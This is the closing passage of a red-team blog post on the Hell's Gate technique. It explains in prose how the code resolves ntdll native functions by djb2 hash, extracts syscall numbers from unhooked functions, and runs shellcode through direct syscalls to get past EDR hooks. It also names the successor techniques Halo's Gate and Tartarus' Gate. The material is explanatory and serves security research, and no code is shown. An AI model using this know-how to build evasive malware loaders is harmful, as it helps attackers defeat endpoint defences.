First, the initialisation { 0 } sets all members of the VX_TABLE structure to zero. Taking NtAllocateVirtualMemory as a representative example for the other three functions, the dwHash member of its VX_TABLE entry is set to the corresponding djb2 hash. Next, the GetVxTableEntry function is called. Remember that this function is used to get the absolute address of the corresponding function (in this case NtAllocateVirtualMemory) in the memory of ntdll.dll. The GetVxTableEntry function is also responsible for doing the opcode comparison, extracting the SSN of the native function and storing it in the wSystemCall member, provided the comparison succeeds, i.e. the native function is not hooked. Once all four entries have been resolved, the Payload function is executed, which uses the externally declared HellsGate and HellDescent functions to execute the direct syscalls to allocate virtual memory, change the page protection, run the shellcode, etc.

Summary

In this blog post we took a closer look at the Hell's Gate code and saw how Hell's Gate executes direct syscalls by dynamically retrieving the SSNs from ntdll.dll without using the GetModuleHandleA and GetProcAddress APIs. In general, the opcode comparison to extract the SSNs from ntdll.dll can still be used, but it is not recommended on its own, because Hell's Gate fails as soon as the EDR hooks any of the native functions used in the POC. Therefore, Sektor7 created an evolution of Hell's Gate called Halo's Gate. In contrast to Hell's Gate, Halo's Gate can dynamically retrieve SSNs from ntdll.dll even if the function is hooked by an EDR. In addition, the Tartarus' Gate POC builds on the same concept as Halo's Gate.

Happy Hacking!

Daniel Feichter @VirtualAllocEx

Last updated 04.11.23 18:44:07